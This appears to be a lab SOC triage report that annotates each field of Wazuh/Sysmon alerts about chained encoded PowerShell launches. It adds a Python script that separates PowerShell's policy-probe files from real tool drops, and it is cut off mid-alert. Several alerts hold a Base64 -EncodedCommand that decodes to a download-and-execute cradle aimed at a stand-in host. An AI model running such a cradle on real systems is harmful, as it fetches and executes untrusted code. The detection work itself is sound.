PID of the Sysmon service that logged the event, not of the process the event describes (that is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread inside the Sysmon service (see data.win.system.processID) that wrote this record. Logger metadata, not a property of the suspect process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means Sysmon telemetry, so read eventID with Sysmon's numbering (1 = Process Create, 11 = FileCreate), not the Security log's.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent is forwarding another host's logs or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:24.704 ProcessGuid: {94294ddc-bcdc-680a-d70a-000000000e00} ProcessId: 13216 Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_qv3prkde.0h0.ps1 CreationUtcTime: 2025-04-24 22:36:24.699 User: NT AUTHORITY\SYSTEM"
Sysmon's rendered text for the event. Every field in it is also broken out under data.win.eventdata below, so pivot on those and keep this string for the ticket.

data.win.eventdata.utcTime:  2025-04-24 22:36:24.704
When the file was created on the endpoint (UTC), stamped by Sysmon. About 40 s before the alert timestamp because of agent-to-manager delay; build the timeline from this field.

data.win.eventdata.processGuid:  {94294ddc-bcdc-680a-d70a-000000000e00}
Sysmon's GUID for the writing process. This GUID does not match either rule 92057 EID1 above, so this is a separate PowerShell instance; search for the EID1 with this processGuid to learn what launched it.

data.win.eventdata.processId:  13216
Windows PID of the writing process (13216, distinct from the 10556 → 2804 → 14284 chain). PIDs are recycled after exit, so pivot on processGuid for anything beyond live triage.

data.win.eventdata.image:  C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the process that wrote the file. SysWOW64 means the 32-bit PowerShell host on a 64-bit Windows; a 32-bit PowerShell running as SYSTEM is worth asking what launched it (find the EID1 with this processGuid).

data.win.eventdata.targetFilename:  C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_qv3prkde.0h0.ps1
Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 is the same AppLocker/WDAC probe file every Windows PowerShell start writes, here landing under C:\Windows\SystemTemp because the process runs as SYSTEM rather than as a user. The file is not a payload; the SYSTEM-level PowerShell that wrote it is what needs explaining.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:24.699
Creation time recorded on disk for the file. Normally within milliseconds of utcTime (5 ms here); a much earlier value means an existing file was overwritten or its timestamp was manipulated (which Sysmon reports separately as EID 2).

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account that wrote the file. NT AUTHORITY\SYSTEM means a PowerShell running with full system privileges wrote it; find the EID1 for this processGuid to see which service, scheduled task or elevated parent launched PID 13216.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions
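Rules 92213 and 92205 above both fired on __PSScriptPolicyTest_*.ps1 files, which Windows PowerShell writes on every start to probe AppLocker/WDAC script policy. The Python below is added here as an example (it is not SOCscribe or Wazuh code): it joins Sysmon EID11 file creates to the EID1 that started the writing process via ProcessGuid/ParentProcessGuid, separates those probe files from genuine tool drops, detects a command line re-spawning itself along the parent chain, and raises the priority when a SYSTEM PowerShell has no process-create event in the data set. GUIDs, PIDs, users and paths are copied from the alerts on this page; the final update.exe record and the abbreviated command line are constructed.

```python
"""Join Sysmon EID11 (FileCreate) alerts to the EID1 (ProcessCreate) of the
writing process via ProcessGuid/ParentProcessGuid, then separate PowerShell's
own AppLocker/WDAC probe files from real tool drops. Added example for this
report, not SOCscribe or Wazuh code. GUIDs, PIDs, users and paths are copied
from the alerts on this page; the update.exe record and the abbreviated
command line are constructed."""
import re

USER = r"Attacker\Attcker1"
ENC_CMD = "powershell.exe -NoLogo -NoProfile -EncodedCommand <Base64 as in the alert>"  # abbreviated
G10556 = "{94294ddc-bce5-680a-df0a-000000000e00}"
G2804 = "{94294ddc-bce6-680a-e10a-000000000e00}"
G13216 = "{94294ddc-bcdc-680a-d70a-000000000e00}"
G14284 = "{94294ddc-bce8-680a-e30a-000000000e00}"

EVENTS = [
    {"eid": 11, "guid": G10556, "pid": 10556, "user": USER,
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_afeyzpts.2r4.ps1"},
    {"eid": 1, "guid": G2804, "pid": 2804, "parent_guid": G10556, "user": USER, "cmdline": ENC_CMD},
    {"eid": 11, "guid": G2804, "pid": 2804, "user": USER,
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_3s1iuxjl.0fp.ps1"},
    {"eid": 11, "guid": G13216, "pid": 13216, "user": r"NT AUTHORITY\SYSTEM",
     "target": r"C:\Windows\SystemTemp\__PSScriptPolicyTest_qv3prkde.0h0.ps1"},
    {"eid": 1, "guid": G14284, "pid": 14284, "parent_guid": G2804, "user": USER, "cmdline": ENC_CMD},
    # Constructed: a genuine drop from the same process, for contrast.
    {"eid": 11, "guid": G14284, "pid": 14284, "user": USER,
     "target": r"C:\Users\Attcker1\AppData\Local\Temp\update.exe"},
]

# Written by every Windows PowerShell start-up to test AppLocker/WDAC policy.
POLICY_PROBE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.psm?1$", re.I)
STAGING_DIR = re.compile(
    r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Windows\\SystemTemp|Users\\Public|ProgramData)\\", re.I)
EXEC_EXT = re.compile(r"\.(?:exe|dll|scr|ps1|psm1|vbs|js|hta|bat|cmd)$", re.I)


def classify_file_create(target: str) -> str:
    if POLICY_PROBE.search(target):
        return "powershell_policy_probe"
    if STAGING_DIR.search(target) and EXEC_EXT.search(target):
        return "tool_drop_review"
    return "other"


def lineage(guid: str, creates: dict, max_depth: int = 16) -> list:
    """EID1 records from this process upward. Stops where the parent's EID1
    is not in the data set (before the collection window, or never logged)."""
    chain, seen = [], set()
    while guid in creates and guid not in seen and len(chain) < max_depth:
        seen.add(guid)
        chain.append(creates[guid])
        guid = creates[guid]["parent_guid"]
    return chain


def priority_for(label: str, user: str, creator_known: bool) -> str:
    if label == "tool_drop_review":
        return "high"
    if label == "powershell_policy_probe":
        # The probe only proves powershell.exe started; that still matters when
        # it ran as SYSTEM and nothing in the data set explains who launched it.
        if user.upper().endswith("\\SYSTEM") and not creator_known:
            return "medium"
        return "low"
    return "info"


def triage_file_creates(events: list) -> list:
    creates = {e["guid"]: e for e in events if e["eid"] == 1}
    results = []
    for e in events:
        if e["eid"] != 11:
            continue
        chain = lineage(e["guid"], creates)
        label = classify_file_create(e["target"])
        results.append({
            "target": e["target"], "user": e["user"], "label": label,
            "creator_known": e["guid"] in creates,
            "lineage_pids": [c["pid"] for c in chain],
            # Parent and child launched with identical command lines: the same
            # payload is re-spawning itself, so count the chain as one activity.
            "self_respawn": any(a["cmdline"] == b["cmdline"] for a, b in zip(chain, chain[1:])),
            "priority": priority_for(label, e["user"], e["guid"] in creates),
        })
    return results


if __name__ == "__main__":
    for r in triage_file_creates(EVENTS):
        print(f"[{r['priority']:<6}] {r['label']:<24} pids={r['lineage_pids']} "
              f"respawn={r['self_respawn']} {r['target']}")
```

Run as-is it prints one line per EID11 record: the three probe files come out low or, for the SYSTEM-owned one with no EID1 in the set, medium; only the constructed update.exe is high, and its lineage shows the 14284 → 2804 chain with the self-respawn flag set. In production the EVENTS list would be the Sysmon records for one host and time window pulled from the indexer, keyed the same way.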

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.537+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059.001 – Command and Scripting Interpreter: PowerShell

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.537+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1167048
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Microsoft-Windows-Sysmon means the data.win.eventdata fields follow Sysmon's schema for this eventID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the ETW provider. {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Sysmon's fixed provider GUID, handy for filtering when the name is absent.

data.win.system.eventID:  1
Event ID within this provider. For Sysmon, 1 = Process Create, 11 = FileCreate, 3 = Network Connect; this is not the Security-log numbering (4688, 4624), even though the same concepts appear there.

data.win.system.version:  5
Schema version of this event type's data layout. Sysmon bumps it when fields are added (ParentUser, for example), so parsers should key on eventID plus version rather than on field position.

data.win.system.level:  4
Windows event level: 1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose. Sysmon writes everything at 4, so this carries no signal; severityValue is the same value spelled out.

data.win.system.task:  1
Task category number. Sysmon sets it equal to the event ID, so it adds nothing here; in Security-log events it names the audit category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:26.9852980Z
When the Windows event log wrote the record (UTC, 100 ns resolution). About 2.6 s after data.win.eventdata.utcTime here; order events by eventRecordID and utcTime, not by this.

data.win.system.eventRecordID:  282793
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the Sysmon service that logged the event, not of the process the event describes (that is data.win.eventdata.processId).

data.win.system.threadID:  4740
Thread inside the Sysmon service (see data.win.system.processID) that wrote this record. Logger metadata, not a property of the suspect process.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record came from. Microsoft-Windows-Sysmon/Operational means Sysmon telemetry, so read eventID with Sysmon's numbering (1 = Process Create, 11 = FileCreate), not the Security log's.

data.win.system.computer:  Attacker
Hostname Windows stamped into the event. Should equal agent.name; a mismatch means the agent is forwarding another host's logs or the machine was renamed.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:24.351 ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} ProcessId: 14284 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce6-680a-e10a-000000000e00} ParentProcessId: 2804 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered text for the event. Every field in it is also broken out under data.win.eventdata below, so pivot on those and keep this string for the ticket.

data.win.eventdata.utcTime:  2025-04-24 22:36:24.351
When the process was created on the endpoint (UTC), stamped by Sysmon. About 1.5 s after the parent (PID 2804) was created and about 40 s before the alert timestamp; build the attack timeline from this field.

data.win.eventdata.processGuid:  {94294ddc-bce8-680a-e30a-000000000e00}
Sysmon's GUID for the new process, unique for its lifetime even when the PID is reused. This is the join key to every other Sysmon event from the same process (file writes, network connects, its own children via parentProcessGuid).

data.win.eventdata.processId:  14284
Windows PID of the new process (14284, third generation of the chain). PIDs are recycled after exit, so use it for live triage only and pivot on processGuid for everything else.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that was launched. Confirm it is the expected system location (System32 here); a powershell.exe copied to a user-writable path is a red flag.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource from the image's PE header. 10.0.26100.x is a Windows 11 24H2 / Server 2025 build; a version that does not match the host's OS build points to a copied or back-level binary.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Genuine on a Microsoft-signed binary, but trivially set on an attacker's own file, so treat it as context, not as trust.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product name from the PE version resource, same caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company name from the PE version resource. For a real Windows binary it agrees with description and product; confirm with the hash when in doubt.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal file name from the PE version resource. Compare with image: if they differ (OriginalFileName PowerShell.EXE but the image is named something else) the binary was renamed to dodge name-based rules (T1036.003).

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line as launched. Same as in the 22:37:02.270 alert: -NoLogo -NoProfile -EncodedCommand with Base64 over UTF-16LE text that decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download cradle (T1059.001 leading to T1105). Decode every -EncodedCommand before closing the alert.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process. The user profile root here; launches from Temp, Downloads or Public are more suspicious.

data.win.eventdata.user:  Attacker\\Attcker1
Account the new process runs as (DOMAIN\user). A local account on host Attacker here; together with logonId it groups everything that logon session did.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
GUID of the logon session. Unchanged from the earlier EID1, so the whole chain runs inside one logon; joins to Security event 4624 to learn how the user logged in.

data.win.eventdata.logonId:  0x26584
Logon session ID (hex LUID). Every process sharing 0x26584 belongs to the same logon; matches SubjectLogonId / TargetLogonId in Security events 4624 and 4688.

data.win.eventdata.terminalSessionId:  1
Windows session number. 0 is the services session; 1 or higher is an interactive console or RDP session, so this ran on a logged-on user's desktop.

data.win.eventdata.integrityLevel:  Medium
Process integrity level (Low, Medium, High, System). Medium is an unelevated standard user; High would mean the attacker already had admin rights past UAC.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hashes of the image, in the algorithms the Sysmon config requested (SHA256 only here). Identical to the hash in the earlier EID1, so it is the same powershell.exe binary; check it against the known-good hash for this OS build or a reputation service.

data.win.eventdata.parentProcessGuid:  {94294ddc-bce6-680a-e10a-000000000e00}
Sysmon GUID of the parent process; follow it to the parent's own EID1. Here it is the PID 2804 PowerShell from the 22:37:02.270 alert, itself spawned by PID 10556 with the same command, so keep walking up until the command line changes to find where the chain really began.

data.win.eventdata.parentProcessId:  2804
PID of the parent at creation time. Subject to reuse; prefer parentProcessGuid for joins.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.552+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.552+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1175115
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:27.2071521Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282794
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:27.162 ProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} ProcessId: 14284 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vr2cdhun.rr0.ps1 CreationUtcTime: 2025-04-24 22:36:27.160 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:27.162
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bce8-680a-e30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vr2cdhun.rr0.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:27.160
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:02.884+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:02.884+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534222.1177884
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:29.5433971Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282818
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:28.213 ProcessGuid: {94294ddc-bcec-680a-e50a-000000000e00} ProcessId: 1468 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bce8-680a-e30a-000000000e00} ParentProcessId: 14284 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand 